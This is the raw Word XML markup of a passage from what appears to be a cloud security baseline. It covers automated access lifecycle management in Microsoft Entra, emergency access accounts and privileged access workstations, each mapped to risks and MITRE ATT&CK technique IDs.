        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FFF75F" w14:textId="44D1EC2D" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:t>manipulating accounts (T1098.001) by modifying IAM policies or disabling MFA to embed persistent access, allowing adversaries to retain unauthorized control over cloud resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18440A74" w14:textId="52A773FA" w:rsidR="00067834" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FD9698" w14:textId="6FF0BE9F" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:t>accessing data from cloud storage (T1530) using over-privileged accounts to enumerate and retrieve sensitive data from storage buckets or databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E10DD9" w14:textId="70CED7AA" w:rsidR="00067834" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7326D4" w14:textId="5EB176EC" w:rsidR="00D50663" w:rsidRPr="00E53977" w:rsidRDefault="00D50663" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50663">
        <w:lastRenderedPageBreak/>
        <w:t>impairing defenses (T1562.001) by disabling cloud audit logging or monitoring with high-privilege accounts, concealing malicious actions like resource modifications.</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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish automated identity and access lifecycle management through the following approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764016EA" w14:textId="6139D4D5" w:rsidR="00067834" w:rsidRPr="00E53977" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Plan access management objectives and scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CCF698" w14:textId="19DEEBBF" w:rsidR="00067834" w:rsidRPr="00E53977" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Assign responsibilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3602C2C5" w14:textId="0DCF17C1" w:rsidR="00067834" w:rsidRPr="00E53977" w:rsidRDefault="00067834" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Designate Global Administrators, Identity Governance Administrators, or catalog owners to manage entitlement management and access packages, delegating to resource owners or project managers who review and approve access requests for specific Azure resource groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AD053F" w14:textId="1A637221" w:rsidR="00B04DA7" w:rsidRPr="00E53977" w:rsidRDefault="00B04DA7" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Set up entitlement management for access request workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B6750F" w14:textId="2BD01C30" w:rsidR="00B04DA7" w:rsidRPr="00E53977" w:rsidRDefault="00B04DA7" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Create catalogs in Microsoft Entra admin center to organize related resources and access packages, adding specific Azure resource groups with their roles (e.g., Contributor, Reader) as catalog resources, then defining access packages specifying which Azure resource group roles users can request along with access duration and approval requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326F8208" w14:textId="500CD6E3" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Configure access policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC93225" w14:textId="5E482373" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Process and review access requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAABF00" w14:textId="441A9767" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Provision and deprovision access automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBE360" w14:textId="08AE87FF" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Upon approval, Microsoft Entra automatically assigns requested Azure roles to users for specified resource groups with immediate access, enforcing automatic </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>revocation when predefined expiration dates are reached per access package policies, while allowing administrators or resource owners to manually remove access if user roles or projects change before expiration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA8256D" w14:textId="77777777" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="00070695"/>
    <w:p w14:paraId="4D4E49ED" w14:textId="77777777" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="00070695"/>
    <w:p w14:paraId="1F73FCC9" w14:textId="77777777" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="00070695"/>
    <w:p w14:paraId="2B9DE3D2" w14:textId="77777777" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="00070695"/>
    <w:p w14:paraId="688AD074" w14:textId="3FB1F671" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="00070695">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc242449494"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>PA-5: Set up emergency access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="36FA95CC" w14:textId="03AA73FF" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBA31B9" w14:textId="076D6281" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Set up emergency access to ensure that you are not accidentally locked out of your critical cloud infrastructure in an emergency. Emergency access accounts should be rarely used and can be highly damaging if compromised, but their availability is critically important for scenarios when they are required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FECB663" w14:textId="486C2482" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="525B7DAC" w14:textId="378FC1B9" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Administrative lockout from cloud tenant management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C45D3" w14:textId="4C12D324" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized access to highly privileged accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3553F767" w14:textId="5A0F9D5F" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insider threats via misused emergency access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247260F8" w14:textId="68D599DC" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lack of auditability for emergency access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B87455" w14:textId="1F79FA4D" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Inadequate logging or monitoring of emergency account activity prevents detection of unauthorized use, delaying incident response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B14499D" w14:textId="7F3A67A6" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Operational failure from untested emergency accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076DA7E9" w14:textId="4FA5CD6E" w:rsidR="00070695" w:rsidRPr="00E53977" w:rsidRDefault="00070695" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C57619" w14:textId="01B3B530" w:rsidR="00D50663" w:rsidRDefault="002F2918" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Initial Access (TA0001) </w:t>
      </w:r>
      <w:r w:rsidR="00D50663">
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3185A724" w14:textId="5582C4D1" w:rsidR="002F2918" w:rsidRPr="00E53977" w:rsidRDefault="002F2918" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Valid Accounts: Cloud Accounts (T1078.004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4ADC45" w14:textId="5CEC2F18" w:rsidR="002F2918" w:rsidRPr="00E53977" w:rsidRDefault="002F2918" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B44CEAA" w14:textId="3960B888" w:rsidR="002F2918" w:rsidRPr="00E53977" w:rsidRDefault="002F2918" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Abuse Elevation Control Mechanism: Cloud Infrastructure (T1548.005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548805CC" w14:textId="6FC49F98" w:rsidR="002F2918" w:rsidRPr="00E53977" w:rsidRDefault="002F2918" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336EDD9E" w14:textId="1A228AD0" w:rsidR="002F2918" w:rsidRPr="00E53977" w:rsidRDefault="002F2918" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Account Manipulation: Additional Cloud Credentials (T1098.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677365E0" w14:textId="261C831E" w:rsidR="002F2918" w:rsidRPr="00E53977" w:rsidRDefault="002F2918" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DEF746" w14:textId="00514EFC" w:rsidR="002F2918" w:rsidRPr="00E53977" w:rsidRDefault="002F2918" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Impaired Defenses: Disable or Modify Cloud Logs (T1562.008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB5596" w14:textId="188E6A86" w:rsidR="002F2918" w:rsidRPr="00E53977" w:rsidRDefault="002F2918" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1D562" w14:textId="4CAEBDF8" w:rsidR="002F2918" w:rsidRPr="00E53977" w:rsidRDefault="002F2918" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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t>PA-5.1: Setup emergency access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F404F7D" w14:textId="6D46D8EC" w:rsidR="00D31546" w:rsidRPr="00E53977" w:rsidRDefault="00D31546" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish emergency access accounts through the following structured approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595DA38D" w14:textId="72E90EFC" w:rsidR="00D31546" w:rsidRPr="00E53977" w:rsidRDefault="00D31546" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Create emergency access accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053BD236" w14:textId="726EE4B5" w:rsidR="00D31546" w:rsidRPr="00E53977" w:rsidRDefault="00D31546" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Secure credentials with dual control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B03302E" w14:textId="329B66EA" w:rsidR="00D31546" w:rsidRPr="00E53977" w:rsidRDefault="00D31546" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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66960F39" w14:textId="12098319" w:rsidR="00D31546" w:rsidRPr="00E53977" w:rsidRDefault="00D31546" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Configure Conditional Access exclusions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF5AE32" w14:textId="3982B239" w:rsidR="00D33208" w:rsidRPr="00E53977" w:rsidRDefault="00D33208" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable comprehensive monitoring and alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBD6118" w14:textId="0C89FD96" w:rsidR="00D33208" w:rsidRPr="00E53977" w:rsidRDefault="00D33208" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Establish testing and maintenance procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EFE4FF" w14:textId="07AE348A" w:rsidR="00D33208" w:rsidRPr="00E53977" w:rsidRDefault="00D33208" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>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2" w:name="_Toc242449495"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>PA-6: Use privileged access solution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="39A6B78A" w14:textId="03DC9262" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A1BEF2" w14:textId="2EA9487F" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F215DCE" w14:textId="1B196066" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential compromise via malware or phishing on administrative workstations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0914A9EC" w14:textId="379B4A31" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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61E4FE17" w14:textId="098C4E08" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege escalation through unsecured workstation configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3364ED4B" w14:textId="4B7BC53C" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized access via insecure remote connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162C5019" w14:textId="3C835A56" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
